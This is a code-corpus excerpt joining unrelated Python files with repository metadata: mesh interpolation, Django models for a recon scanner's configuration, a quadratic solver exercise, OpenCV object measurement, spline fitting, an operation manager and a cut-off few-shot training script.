backed by either a set or BitVector depending on how many numbers are in
the set.
Provides ``add``, ``remove``, ``union``, ``intersection``,
``__contains__``, ``__len__``, ``__iter__``, ``__and__``, ``__or__``, and
methods.
"""
def __init__(self, size, source=None):
self.size = size
self._back = ()
self._switch(size > 256)
if source:
for num in source:
self.add(num)
def _switch(self, toset):
if toset:
self._back = set(self._back)
self.add = self._set_add
self.remove = self._back.remove
else:
self._back = BitVector(self.size, source=self._back)
self.add = self._back.set
self.remove = self._vec_remove
self.__contains__ = self._back.__contains__
def __repr__(self):
return "<%s %s/%s>" % (self.__class__.__name__, len(self._back), self.size)
def __len__(self):
return len(self._back)
def __iter__(self):
return self._back.__iter__()
def as_set(self):
return frozenset(self._back)
def union(self, other):
return self.__or__(other)
def intersection(self, other):
return self.__and__(other)
def invert(self):
return BitSet(self.size, (x for x in xrange(self.size) if x not in self))
def __and__(self, other):
return BitSet(self.size, self._back.intersection(other))
def __or__(self, other):
return BitSet(self.size, self._back.union(other))
def __rand__(self, other):
return self.__and__(other)
def __ror__(self, other):
return self.__or__(other)
def __invert__(self):
return self.invert()
def _set_add(self, num):
self._back.add(num)
if len(self._back) * 4 > self.size // 8 + 32:
self._switch(False)
def _vec_remove(self, num):
self._back.clear(num)
if len(self._back) * 4 < self.size // 8 - 32:
self._switch(True)
| 30.538745 | 94 | 0.518246 |
4a1b5f57a8c99a13fea9173a4a9093d8cb6f5476
| 1,873 |
py
|
Python
|
examples/misc_examples/interpolate_example.py
|
SAFedorov/bfieldtools
|
7e64bc2033670f01d2b90df2210b60743731a948
|
[
"BSD-3-Clause"
] | 17 |
2020-05-22T19:39:39.000Z
|
2022-03-15T19:03:09.000Z
|
examples/misc_examples/interpolate_example.py
|
SAFedorov/bfieldtools
|
7e64bc2033670f01d2b90df2210b60743731a948
|
[
"BSD-3-Clause"
] | 27 |
2020-05-20T14:22:41.000Z
|
2022-01-10T18:30:12.000Z
|
examples/misc_examples/interpolate_example.py
|
SAFedorov/bfieldtools
|
7e64bc2033670f01d2b90df2210b60743731a948
|
[
"BSD-3-Clause"
] | 8 |
2020-08-12T10:30:50.000Z
|
2022-03-22T12:21:33.000Z
|
"""
Interpolate stream function
===========================
Minimal example showing how to subdivide a mesh and interpolate a scalar function
defined on that mesh to match.
"""
from tvtk.api import tvtk
from mayavi import mlab
import trimesh
import numpy as np
from scipy.linalg import eigh
from bfieldtools.mesh_calculus import laplacian_matrix, mass_matrix
from bfieldtools import utils
import pkg_resources
#%%
# Load a simple mesh and compute an example scalar function on it.
# In this case, the scalar function is an eigenvector of a generalized eigenvalue decomposition
mesh = trimesh.load(
pkg_resources.resource_filename("bfieldtools", "example_meshes/10x10_plane.obj")
)
boundaries, inner_verts = utils.find_mesh_boundaries(mesh)
L = laplacian_matrix(mesh)
M = mass_matrix(mesh)
u, v = eigh(
-L.todense()[inner_verts][:, inner_verts], M.todense()[inner_verts][:, inner_verts]
)
scalars = np.zeros(mesh.vertices.shape[0])
scalars[inner_verts] = v[:, 12]
original_scalars = scalars.copy()
original_mesh = mesh.copy()
#%%
# Plot original scalars and mesh
scene = mlab.figure(None, bgcolor=(1, 1, 1), fgcolor=(0.5, 0.5, 0.5), size=(800, 800))
mlab.triangular_mesh(
*original_mesh.vertices.T,
original_mesh.faces,
scalars=original_scalars,
representation="wireframe"
)
#%%
# Now, interpolate scalars
ug = tvtk.UnstructuredGrid(points=mesh.vertices)
ug.set_cells(tvtk.Triangle().cell_type, mesh.faces)
ug.point_data.scalars = scalars
ug.point_data.scalars.name = "scalars"
mesh = original_mesh.subdivide().subdivide()
scalars = mlab.pipeline.probe_data(ug, *mesh.vertices.T)
#%%
# Plot subdivided mesh and interpolated scalars
scene = mlab.figure(None, bgcolor=(1, 1, 1), fgcolor=(0.5, 0.5, 0.5), size=(800, 800))
mlab.triangular_mesh(
*mesh.vertices.T, mesh.faces, scalars=scalars, representation="wireframe"
)
| 22.566265 | 95 | 0.735184 |
4a1b613195df3a16a647b846392ab647f1c2b0f5
| 951 |
py
|
Python
|
scanEngine/models.py
|
Suprita-25/rengine
|
d6aabb49f27f7ad6039477c16a96213b0d80f81f
|
[
"MIT"
] | null | null | null |
scanEngine/models.py
|
Suprita-25/rengine
|
d6aabb49f27f7ad6039477c16a96213b0d80f81f
|
[
"MIT"
] | null | null | null |
scanEngine/models.py
|
Suprita-25/rengine
|
d6aabb49f27f7ad6039477c16a96213b0d80f81f
|
[
"MIT"
] | null | null | null |
from django.db import models
class EngineType(models.Model):
engine_name = models.CharField(max_length=200)
subdomain_discovery = models.BooleanField()
dir_file_search = models.BooleanField()
subdomain_takeover = models.BooleanField()
port_scan = models.BooleanField()
fetch_url = models.BooleanField()
yaml_configuration = models.TextField()
default_engine = models.BooleanField(null=True, default=False)
def __str__(self):
return self.engine_name
class Wordlist(models.Model):
name = models.CharField(max_length=200)
short_name = models.CharField(max_length=50, unique=True)
count = models.IntegerField(default=0)
def __str__(self):
return self.name
class Configuration(models.Model):
name = models.CharField(max_length=200)
short_name = models.CharField(max_length=50, unique=True)
content = models.TextField()
def __str__(self):
return self.name
| 27.970588 | 66 | 0.724501 |
4a1b63d761246f351ce1086a15165b3ddf3304a2
| 1,109 |
py
|
Python
|
Exercicios Estruturas Logicas e Condicionais/exercicio 25 - secao 05.py
|
cristinamais/exercicios_python
|
8a09b0b68ffaa62d13afb952998e890a79667c7e
|
[
"MIT"
] | null | null | null |
Exercicios Estruturas Logicas e Condicionais/exercicio 25 - secao 05.py
|
cristinamais/exercicios_python
|
8a09b0b68ffaa62d13afb952998e890a79667c7e
|
[
"MIT"
] | null | null | null |
Exercicios Estruturas Logicas e Condicionais/exercicio 25 - secao 05.py
|
cristinamais/exercicios_python
|
8a09b0b68ffaa62d13afb952998e890a79667c7e
|
[
"MIT"
] | null | null | null |
"""
25 - Calcule as raizes da equação de 2º grau.
lembrando que:
x = -b, + ou - raiz de delta / 2a. Onde:
raiz de delta = B² - 4ac.
E ax² + bx + c = 0 representa uma equação de 2º grau.
A variável de zero tem que ser diferente de zero. Caso seja igual, imprima a
mensagem "Não é equação de segundo grau."
Se Delta < 0, não existe real. Imprima não existe raiz.
Se Delta = 0, existe uma raiz real. Imprima a raiz e a mensagem Raiz única.
Se Delta >= 0, imprima as duas raízes reais
"""
import math
a = int(input("Digite o valor de a: "))
b = int(input("Digite o valor de b: "))
c = int(input("Digite o valor de c: "))
#ax² + bx + c = 0 --> é o que queremos saber.
#valor de delta: B² - 4ac.
delta = (b * b) + (-4 * a * c)
if delta > 0:
print(f'O valor de delta é {delta}')
x1 = (- b + (math.sqrt(delta))) / 2 * a
print(f'Essa é a primeira raiz quadrada, ou x1 {x1}')
x2 = (- b - (math.sqrt(delta))) / 2 * a
print(f'Essa é a segunda raiz quadrada, ou x2 {x2}')
elif delta == 0:
print(f'A raiz de delta é {delta} sendo Raiz única.')
else:
delta < 0
print('Não existe raiz')
| 29.972973 | 76 | 0.625789 |
4a1b64773351b6a7ae40acf1eb8118c14f83366a
| 4,054 |
py
|
Python
|
src/testing/distance_measurement/object_size_example.py
|
wenksi/pren-robo-cube-ipcv
|
e2cf655a7e33aa63dae6e2b2a91abaa11d587f8f
|
[
"MIT"
] | null | null | null |
src/testing/distance_measurement/object_size_example.py
|
wenksi/pren-robo-cube-ipcv
|
e2cf655a7e33aa63dae6e2b2a91abaa11d587f8f
|
[
"MIT"
] | null | null | null |
src/testing/distance_measurement/object_size_example.py
|
wenksi/pren-robo-cube-ipcv
|
e2cf655a7e33aa63dae6e2b2a91abaa11d587f8f
|
[
"MIT"
] | null | null | null |
#https://www.pyimagesearch.com/2016/03/28/measuring-size-of-objects-in-an-image-with-opencv/
# import the necessary packages
from scipy.spatial import distance as dist
from imutils import perspective
from imutils import contours
import numpy as np
import argparse
import imutils
import cv2
def midpoint(ptA, ptB):
return ((ptA[0] + ptB[0]) * 0.5, (ptA[1] + ptB[1]) * 0.5)
# drawing parameters
fontColor = (255, 0, 0)
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
help="path to the input image")
ap.add_argument("-w", "--width", type=float, required=True,
help="width of the left-most object in the image (in inches)")
args = vars(ap.parse_args())
# load the image, convert it to grayscale, and blur it slightly
image = cv2.imread(args["image"])
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# perform edge detection, then perform a dilation + erosion to
# close gaps in between object edges
edged = cv2.Canny(gray, 50, 100)
edged = cv2.dilate(edged, None, iterations=1)
edged = cv2.erode(edged, None, iterations=1)
# find contours in the edge map
cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
# sort the contours from left-to-right and initialize the
# 'pixels per metric' calibration variable
(cnts, _) = contours.sort_contours(cnts)
pixelsPerMetric = None
# loop over the contours individually
for c in cnts:
# if the contour is not sufficiently large, ignore it
if cv2.contourArea(c) < 100:
continue
# compute the rotated bounding box of the contour
orig = image.copy()
box = cv2.minAreaRect(c)
box = cv2.cv.BoxPoints(box) if imutils.is_cv2() else cv2.boxPoints(box)
box = np.array(box, dtype="int")
# order the points in the contour such that they appear
# in top-left, top-right, bottom-right, and bottom-left
# order, then draw the outline of the rotated bounding
# box
box = perspective.order_points(box)
cv2.drawContours(orig, [box.astype("int")], -1, (0, 255, 0), 2)
# loop over the original points and draw them
for (x, y) in box:
cv2.circle(orig, (int(x), int(y)), 5, (0, 0, 255), -1)
# unpack the ordered bounding box, then compute the midpoint
# between the top-left and top-right coordinates, followed by
# the midpoint between bottom-left and bottom-right coordinates
(tl, tr, br, bl) = box
(tltrX, tltrY) = midpoint(tl, tr)
(blbrX, blbrY) = midpoint(bl, br)
# compute the midpoint between the top-left and top-right points,
# followed by the midpoint between the top-righ and bottom-right
(tlblX, tlblY) = midpoint(tl, bl)
(trbrX, trbrY) = midpoint(tr, br)
# draw the midpoints on the image
cv2.circle(orig, (int(tltrX), int(tltrY)), 5, (255, 0, 0), -1)
cv2.circle(orig, (int(blbrX), int(blbrY)), 5, (255, 0, 0), -1)
cv2.circle(orig, (int(tlblX), int(tlblY)), 5, (255, 0, 0), -1)
cv2.circle(orig, (int(trbrX), int(trbrY)), 5, (255, 0, 0), -1)
# draw lines between the midpoints
cv2.line(orig, (int(tltrX), int(tltrY)), (int(blbrX), int(blbrY)),
(255, 0, 255), 2)
cv2.line(orig, (int(tlblX), int(tlblY)), (int(trbrX), int(trbrY)),
(255, 0, 255), 2)
# compute the Euclidean distance between the midpoints
dA = dist.euclidean((tltrX, tltrY), (blbrX, blbrY))
dB = dist.euclidean((tlblX, tlblY), (trbrX, trbrY))
# if the pixels per metric has not been initialized, then
# compute it as the ratio of pixels to supplied metric
# (in this case, inches)
if pixelsPerMetric is None:
pixelsPerMetric = dB / args["width"]
# compute the size of the object
dimA = dA / pixelsPerMetric
dimB = dB / pixelsPerMetric
# draw the object sizes on the image
cv2.putText(orig, "{:.1f}in".format(dimA),
(int(tltrX - 15), int(tltrY - 10)), cv2.FONT_HERSHEY_SIMPLEX,
0.65, fontColor, 2)
cv2.putText(orig, "{:.1f}in".format(dimB),
(int(trbrX + 10), int(trbrY)), cv2.FONT_HERSHEY_SIMPLEX,
0.65, fontColor, 2)
# show the output image
cv2.imshow("Image", orig)
cv2.waitKey(0)
| 34.355932 | 92 | 0.703749 |
4a1b64bdc55834f19c86767f5553910b801fe51d
| 885 |
py
|
Python
|
3.3.9/project/middlewares/spider_middlewares.py
|
feel-easy/myspider
|
dcc65032015d7dbd8bea78f846fd3cac7638c332
|
[
"Apache-2.0"
] | 1 |
2019-02-28T10:16:00.000Z
|
2019-02-28T10:16:00.000Z
|
3.3.9/project/middlewares/spider_middlewares.py
|
wasalen/myspider
|
dcc65032015d7dbd8bea78f846fd3cac7638c332
|
[
"Apache-2.0"
] | null | null | null |
3.3.9/project/middlewares/spider_middlewares.py
|
wasalen/myspider
|
dcc65032015d7dbd8bea78f846fd3cac7638c332
|
[
"Apache-2.0"
] | null | null | null |
# THE WINTER IS COMING! the old driver will be driving who was a man of the world!
# -*- coding: utf-8 -*- python 3.6.7, create time is 18-12-1 下午4:10 GMT+8
class TestSpiderMiddleware1(object):
def process_request(self, request, spider):
'''处理请求头,添加默认的user-agent'''
print("TestSpiderMiddleware1: process_request")
return request
def process_response(self, request, response, spider):
'''处理数据对象'''
print("TestSpiderMiddleware1: process_response")
return response
class TestSpiderMiddleware2(object):
def process_request(self, request, spider):
'''处理请求头,添加默认的user-agent'''
print("TestSpiderMiddleware2: process_request")
return request
def process_response(self, request, response, spider):
'''处理数据对象'''
print("TestSpiderMiddleware2: process_response")
return response
| 32.777778 | 82 | 0.676836 |
4a1b64c0e86378ae2ae8e0c9f9d9cf0a6f17c89b
| 1,808 |
py
|
Python
|
src/cldfbench/commands/catinfo.py
|
johenglisch/cldfbench
|
59e868015beb0d86c5855f66d659866b322dcebc
|
[
"Apache-2.0"
] | 4 |
2019-10-16T07:45:09.000Z
|
2021-12-27T22:10:07.000Z
|
src/cldfbench/commands/catinfo.py
|
johenglisch/cldfbench
|
59e868015beb0d86c5855f66d659866b322dcebc
|
[
"Apache-2.0"
] | 63 |
2019-10-04T10:29:21.000Z
|
2022-03-25T09:08:57.000Z
|
src/cldfbench/commands/catinfo.py
|
johenglisch/cldfbench
|
59e868015beb0d86c5855f66d659866b322dcebc
|
[
"Apache-2.0"
] | 4 |
2019-11-26T10:29:27.000Z
|
2021-02-10T08:34:49.000Z
|
"""
Display information about catalogs in the system
"""
import termcolor
from cldfcatalog import Config
from cldfbench.cli_util import add_catalog_spec
from cldfbench.catalogs import BUILTIN_CATALOGS
from cldfbench.util import iter_aligned
def register(parser):
for cat in BUILTIN_CATALOGS:
add_catalog_spec(parser, cat.cli_name(), with_version=False)
parser.add_argument(
'--max-versions',
default=5,
help='Maximal number of versions to display',
type=int)
parser.set_defaults(no_catalogs=True)
def print_kv(k, v=''):
print('{0} {1}'.format(termcolor.colored('{0}:'.format(k), attrs=['bold']), v))
def run(args):
cfg = Config.from_file()
for cat in BUILTIN_CATALOGS:
name = cat.cli_name()
print()
print(termcolor.colored(
'{0} - https://github.com/{1}'.format(name, cat.__github__),
attrs=['bold', 'underline']))
print()
path, from_cfg = getattr(args, name), False
if (not path) and (not args.no_config):
try:
path, from_cfg = cfg.get_clone(name), True
except KeyError as e:
args.log.warning(str(e))
continue
try:
cat = cat(path)
except ValueError as e: # pragma: no cover
args.log.warning(str(e))
continue
print_kv('local clone', cat.dir.resolve())
if from_cfg:
print_kv('config at', cfg.fname())
print_kv('versions')
for i, version in enumerate(iter_aligned(cat.iter_versions(), prefix=' ')):
if i < args.max_versions:
print(version)
if cat.__api__:
print_kv('API', '{0.__name__} {0.__version__}'.format(cat.__api_pkg__))
print()
| 28.698413 | 84 | 0.591814 |
4a1b664710de9b25fcf4cdb3f20562b4a119a272
| 3,612 |
py
|
Python
|
voltoolbox/fit/average_spline.py
|
quintron/vol-toolbox
|
0bddb66c0160da1fb9393c60f6a99600311bbcf9
|
[
"MIT"
] | null | null | null |
voltoolbox/fit/average_spline.py
|
quintron/vol-toolbox
|
0bddb66c0160da1fb9393c60f6a99600311bbcf9
|
[
"MIT"
] | null | null | null |
voltoolbox/fit/average_spline.py
|
quintron/vol-toolbox
|
0bddb66c0160da1fb9393c60f6a99600311bbcf9
|
[
"MIT"
] | 1 |
2020-08-18T17:56:09.000Z
|
2020-08-18T17:56:09.000Z
|
import numpy as np
import scipy.integrate as integrate
def avg(f, z):
if abs(z) < 1.0e-15:
return f(0.0)
x, _ = integrate.quad(f, 0.0, z)
return x / z
class AverageSpline(object):
def __init__(self, put_zs=None, call_zs=None):
self.put_zs = tuple(put_zs) if put_zs else tuple()
self.call_zs = tuple(call_zs)if call_zs else tuple()
def put_wing(self, i, z):
assert(0 <= i < len(self.put_zs) - 1)
if i == 0:
a, b, c = (-self.put_zs[1], -self.put_zs[0], 0.0)
else:
a, b, c = (-self.put_zs[i+1], -self.put_zs[i], -self.put_zs[i-1])
res = (max(0, c - z)**3 - max(0, b - z)**3) / (c - b)
res -= (max(0, b - z)**3 -max(0, a - z)**3) / (b - a)
return res / 6.0
def call_wing(self, i, z):
assert(0 <= i < len(self.call_zs) - 1)
if i==0:
a, b, c = (0.0, self.call_zs[0], self.call_zs[1])
else:
a, b, c = (self.call_zs[i-1], self.call_zs[i], self.call_zs[i+1])
res = (max(0, z - a)**3 -max(0, z - b)**3) / (b - a)
res -= (max(0, z - b)**3 -max(0, z - c)**3) / (c - b)
return res / 6.0
def convex(self, z):
a, b, c = (-2.0, 0.0, 2.0)
res = (max(0, z - a)**3 - max(0, z - b)**3) / (b - a)
res -= (max(0, z - b)**3 - max(0, z - c)**3) / (c - b)
res -= (b - a)**2
res += (max(0, c - z)**3 - max(0, b - z)**3) / (c - b)
res -= (max(0, b - z)**3 - max(0, a - z)**3) / (b - a)
res -= (c-b)**2
return res / 12.0
def slope(self, z):
return z
def put_wing_avg(self, i, z):
return avg(lambda x: self.put_wing(i, x), z)
def call_wing_avg(self, i, z):
return avg(lambda x: self.call_wing(i, x), z)
def convex_avg(self, z):
return avg(self.convex, z)
def slope_avg(self, z):
return avg(self.slope, z)
def compute_avg_vals(self, xs):
vals = [np.array([1.0] * xs.shape[0]),
np.vectorize(self.slope_avg)(xs),
np.vectorize(self.convex_avg)(xs)]
for i in range(0, len(self.call_zs) - 1):
vals += [np.vectorize(lambda x: self.call_wing_avg(i, x))(xs)]
for i in range(0, len(self.put_zs) - 1):
vals += [np.vectorize(lambda x: self.put_wing_avg(i, x))(xs)]
return np.column_stack(vals)
def compute_vals(self, xs):
vals = [np.array([1.0] * xs.shape[0]),
np.vectorize(self.slope)(xs),
np.vectorize(self.convex)(xs)]
for i in range(0, len(self.call_zs) - 1):
vals += [np.vectorize(lambda x: self.call_wing(i, x))(xs)]
for i in range(0, len(self.put_zs) - 1):
vals += [np.vectorize(lambda x: self.put_wing(i, x))(xs)]
return np.column_stack(vals)
def fit_coeffs(self, xs, vals, errs=None, *, smoothing=1.0e-12):
if errs is None:
errs = np.array([1.0] * xs.shape[0])
basis_vals = self.compute_avg_vals(xs)
basis_vals /= np.column_stack([errs])
target = vals / errs
var = np.matmul(basis_vals.T, basis_vals)
var_regul = smoothing * var.trace() * np.identity(var.shape[0])
var_regul[0,0] = 0.0 # dont need to smooth level
var_regul[1,1] = 0.0 # dont need to smooth slope
var_regul[2,2] = 0.0 # dont need to smooth convexity
var += var_regul
cov = basis_vals.T.dot(target)
return np.linalg.solve(var, cov)
| 34.730769 | 77 | 0.495293 |
4a1b66b5e34c4759f9d97bd84f874080504b6f5b
| 11,655 |
py
|
Python
|
backend/op/op_manager.py
|
sleepingAnt/viewfinder
|
9caf4e75faa8070d85f605c91d4cfb52c4674588
|
[
"Apache-2.0"
] | 645 |
2015-01-03T02:03:59.000Z
|
2021-12-03T08:43:16.000Z
|
backend/op/op_manager.py
|
hoowang/viewfinder
|
9caf4e75faa8070d85f605c91d4cfb52c4674588
|
[
"Apache-2.0"
] | null | null | null |
backend/op/op_manager.py
|
hoowang/viewfinder
|
9caf4e75faa8070d85f605c91d4cfb52c4674588
|
[
"Apache-2.0"
] | 222 |
2015-01-07T05:00:52.000Z
|
2021-12-06T09:54:26.000Z
|
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Viewfinder operation manager.
The operation manager tracks and executes operations submitted by user devices. The key goals
of the operation manager are:
- Provide restart functionality for incomplete operations
- Serialize operations coming from a single device
- Mutual exclusion between multiple processing servers (only one server may operate on a
user's operations at a time).
Restart functionality is achieved by writing each operation as JSON-encoded data to the
Operation table. Operations are given a unique id that is allocated by client devices, which
should be the order that the client would like them run by the server. Mutual exclusion is
assured by acquiring a per-user lock for operations submitted by a particular user. The
operation lock provides a server with exclusive access to operations for a user. With the lock,
the server processes each pending operation in order for a device (operations from multiple
devices may be interleaved). Another server receiving an operation for a locked user will
simply write the op to the database and continue. If a server with a lock crashes, then
operations for that user will stall for a maximum of the lock expiration time. Each server
periodically scans the lock table to pick up and resuscitate idle user operation queues which
were dropped or ignored (e.g. due to excessive load).
In cases where an operation hits transient problems (such as database unavailability) or bugs,
the operation will be retried by the manager. After a number of such retries, the operation
manager will eventually give up and put that operation into "quarantine", which means it will
be saved in the database for later developer inspection and repair. The quarantine state is
useful because without it, a failed operation would retain the operation lock and prevent all
future operations for that user from executing. This would result in total user lockout.
OpManager: one instance per server; processes user ops which have fallen through the cracks
"""
__authors__ = ['spencer@emailscrubbed.com (Spencer Kimball)',
'andy@emailscrubbed.com (Andy Kimball)']
import logging
import random
import time
from datetime import timedelta
from functools import partial
from tornado import gen, stack_context
from tornado.ioloop import IOLoop
from viewfinder.backend.base import message, util
from viewfinder.backend.db import db_client
from viewfinder.backend.db.lock import Lock
from viewfinder.backend.db.lock_resource_type import LockResourceType
class OpManager(object):
"""Submit new operations to the op manager via the "MaybeExecuteOp" method. The OpManager
class manages the set of all users that have submitted operations to this server. However,
the queue of operations is actually managed and executed by an instance of the UserOpManager
class.
Periodically scans the database for abandoned locks and failed operations. Each abandoned
lock is associated with user operations that have stalled and need to be restarted. Each
failed operation needs to be periodically retried in order to see if the underlying issue
has been fixed.
On startup, a random time offset is chosen before initiating the first scan. This is meant
to avoid multiple servers scanning the same data.
This class is meant to be a singleton for each instance of the server. Access the instance
via OpManager.Instance().
"""
_MAX_USERS_OUTSTANDING = 1000
"""Maximum number of users that can be under management for scans to take place."""
_SCAN_LIMIT = 10
"""Maximum number of abandoned locks and failed operations that will be returned from scans
(i.e. after filtering).
"""
_MAX_SCAN_ABANDONED_LOCKS_INTERVAL = timedelta(seconds=60)
"""Time between scans for abandoned locks."""
_MAX_SCAN_FAILED_OPS_INTERVAL = timedelta(hours=6)
"""Time between scans for failed operations to retry."""
def __init__(self, op_map, client=None, scan_ops=False):
"""Initializes the operation map, which is a dictionary mapping from operation method str
to an instance of OpMapEntry. Also initializes maps for active users (map from user id to
an instance of UserOpManager).
"""
self.op_map = op_map
self._client = client or db_client.Instance()
self._active_users = dict()
self._drain_callback = None
if scan_ops:
self._ScanAbandonedLocks()
self._ScanFailedOps()
def WaitForUserOps(self, client, user_id, callback):
"""Wait for all ops running on behalf of user_id to complete. WaitForOp behaves exactly
like using the "synchronous" option when submitting an operation. The callback will be
invoked once all operations are completed or they're backed off due to repeated failure.
"""
self.MaybeExecuteOp(client, user_id, None, callback)
def Drain(self, callback):
"""Invokes "callback" when there is no current work to be done.
To be used for cleanup in tests.
"""
if not self._active_users:
IOLoop.current().add_callback(callback)
else:
self._drain_callback = stack_context.wrap(callback)
def MaybeExecuteOp(self, client, user_id, operation_id, wait_callback=None):
"""Adds the op's user to the queue and attempts to begin processing the operation. If the
user is already locked by another server, or if this server is already executing operations
for this user, then the operation is merely queued for later execution.
If the "wait_callback" function is specified, then it is called once the operation has
completed execution (or an error has occurred). This is useful for testing. The callback
should have the form:
OnExecution(value=None, type=None, tb=None)
"""
from viewfinder.backend.op.user_op_manager import UserOpManager
user_op_mgr = self._active_users.get(user_id, None)
if user_op_mgr is None:
user_op_mgr = UserOpManager(client, self.op_map, user_id,
partial(self._OnCompletedOp, user_id))
self._active_users[user_id] = user_op_mgr
user_op_mgr.Execute(operation_id, wait_callback)
def _OnCompletedOp(self, user_id):
"""Removes the user from the list of active users, since all of that user's operations have
been executed.
"""
del self._active_users[user_id]
if not self._active_users and self._drain_callback:
IOLoop.current().add_callback(self._drain_callback)
self._drain_callback = None
@gen.engine
def _ScanFailedOps(self):
"""Periodically scans the Operation table for operations which have failed and are ready
to retry. If any are found, they are retried to see if the error that originally caused
them to fail has been fixed.
"""
from viewfinder.backend.db.operation import Operation
max_timeout_secs = OpManager._MAX_SCAN_FAILED_OPS_INTERVAL.total_seconds()
while True:
# If there are too many active users, do not scan.
if len(self._active_users) < self._MAX_USERS_OUTSTANDING:
try:
last_key = None
while True:
limit = min(self._MAX_USERS_OUTSTANDING - len(self._active_users), OpManager._SCAN_LIMIT)
ops, last_key = yield gen.Task(Operation.ScanFailed,
self._client,
limit=limit,
excl_start_key=last_key)
# Add each operation to the queue for the owning user.
for op in ops:
logging.info('scanned failed operation "%s" for user %d' % (op.operation_id, op.user_id))
if op.user_id not in self._active_users:
# Create a clean context for this operation since we're not blocking the current
# coroutine on it.
with stack_context.NullContext():
with util.ExceptionBarrier(util.LogExceptionCallback):
self.MaybeExecuteOp(self._client, op.user_id, op.operation_id)
# Keep iterating until all failed operations have been found, otherwise wait until the next scan time.
if last_key is None:
break
except Exception:
logging.exception('failed op scan failed')
# Wait until next scan time.
timeout_secs = random.random() * max_timeout_secs
timeout_time = time.time() + timeout_secs
logging.debug('next scan in %.2fs' % timeout_secs)
yield gen.Task(IOLoop.current().add_timeout, timeout_time)
@gen.engine
def _ScanAbandonedLocks(self):
"""Periodically scans the Locks table looking for abandoned operation
locks. If any are found, the associated operations are executed.
TODO(Andy): Scanning for abandoned locks really should go into a
LockManager class. See header for lock.py.
"""
max_timeout_secs = OpManager._MAX_SCAN_ABANDONED_LOCKS_INTERVAL.total_seconds()
while True:
# If there are too many active users, do not scan.
if len(self._active_users) < self._MAX_USERS_OUTSTANDING:
try:
last_key = None
while True:
limit = min(self._MAX_USERS_OUTSTANDING - len(self._active_users), OpManager._SCAN_LIMIT)
locks, last_key = yield gen.Task(Lock.ScanAbandoned,
self._client,
limit=limit,
excl_start_key=last_key)
for lock in locks:
resource_type, resource_id = Lock.DeconstructLockId(lock.lock_id)
if resource_type == LockResourceType.Operation:
user_id = int(resource_id)
logging.info('scanned operation lock for user %d' % user_id)
# Create a clean context for this operation since we're not blocking the current
# coroutine on it.
with stack_context.NullContext():
with util.ExceptionBarrier(util.LogExceptionCallback):
self.MaybeExecuteOp(self._client, user_id, lock.resource_data)
# Keep iterating until all abandoned locks have been found, otherwise wait until the next scan time.
if last_key is None:
break
except Exception:
logging.exception('abandoned lock scan failed')
# Wait until next scan time.
timeout_secs = random.random() * max_timeout_secs
timeout_time = time.time() + timeout_secs
logging.debug('next scan in %.2fs' % timeout_secs)
yield gen.Task(IOLoop.current().add_timeout, timeout_time)
@staticmethod
def SetInstance(op_manager):
"""Sets the per-process instance of the OpManager class."""
OpManager._instance = op_manager
@staticmethod
def Instance():
"""Gets the per-process instance of the OpManager class."""
assert hasattr(OpManager, '_instance'), 'instance not initialized'
return OpManager._instance
class OpMapEntry(object):
"""The OpManager constructor is supplied with the "operation map",
which is a dictionary mapping from operation method str to an
instance of this class. Each operation method is associated with
the following information:
handler: Method to invoke in order to execute the operation.
migrators: Message version migrators for the method args.
scrubber: Scrubs personal info from operation args before logging.
"""
def __init__(self, handler, migrators=[], scrubber=None):
self.handler = handler
self.migrators = sorted(message.REQUIRED_MIGRATORS + migrators)
self.scrubber = scrubber
| 45.705882 | 114 | 0.711111 |
4a1b67f2ccab7f6c325c67e849ab99eb03ffb635
| 8,146 |
py
|
Python
|
scripts/train.py
|
leezhp1994/TMHFS
|
4711c38aab7657313eea3697da5cb1e4122ae8c8
|
[
"Apache-2.0"
] | 7 |
2020-05-20T02:22:25.000Z
|
2021-03-26T08:51:51.000Z
|
scripts/train.py
|
leezhp1994/TMHFS
|
4711c38aab7657313eea3697da5cb1e4122ae8c8
|
[
"Apache-2.0"
] | null | null | null |
scripts/train.py
|
leezhp1994/TMHFS
|
4711c38aab7657313eea3697da5cb1e4122ae8c8
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
sys.path.append('../')
import argparse
import numpy as np
import torch
from utils.generator.generators_train import miniImageNetGenerator as train_loader
from utils.model import Runner
from utils import configs
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--is_train', type=str2bool, default=True,
help='Choice train or test.')
parser.add_argument('--n_folder', type=int, default=0,
help='Number of folder.')
parser.add_argument('--gpu', type=int, default=0,
help='GPU device number.')
parser.add_argument('--backbone', type=str, default='ResNet-12',
help='Choice backbone such as ConvNet-64, ConvNet-128, ConvNet-256 and ResNet-12.')
parser.add_argument('--initial_lr', type=float, default=1e-1,
help='Initial learning rate.')
parser.add_argument('--first_decay', type=int, default=25000,
help='First decay step.')
parser.add_argument('--second_decay', type=int, default=35000,
help='Second decay step.')
parser.add_argument('--transductive', type=str2bool, default=True,
help='Whether to use transductive training or not.')
parser.add_argument('--flip', type=str2bool, default=True,
help='Whether to inject data uncertainty.')
parser.add_argument('--drop', type=str2bool, default=True,
help='Whether to inject model uncertainty.')
parser.add_argument('--n_shot', type=int, default=5,
help='Number of support set per class in train.')
parser.add_argument('--n_query', type=int, default=8,
help='Number of queries per class in train.')
parser.add_argument('--n_test_query', type=int, default=15,
help='Number of queries per class in test.')
parser.add_argument('--n_train_class', type=int, default=15,
help='Number of way for training episode.')
parser.add_argument('--n_test_class', type=int, default=5,
help='Number of way for test episode.')
parser.add_argument('--save', type=str, default='default',
help='Choice backbone such as ConvNet-64, ConvNet-128, ConvNet-256 and ResNet-12.')
parser.add_argument('--test_data', type=str, default='ISIC',
help='Name of test dataset.')
parser.add_argument('--test_aug', type=int, default=0,
help='Number of data augmentation methods.')
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
#######################
folder_num = args.n_folder
# optimizer setting
max_iter = 50000
lrstep2 = args.second_decay
lrstep1 = args.first_decay
initial_lr = args.initial_lr
# train episode setting
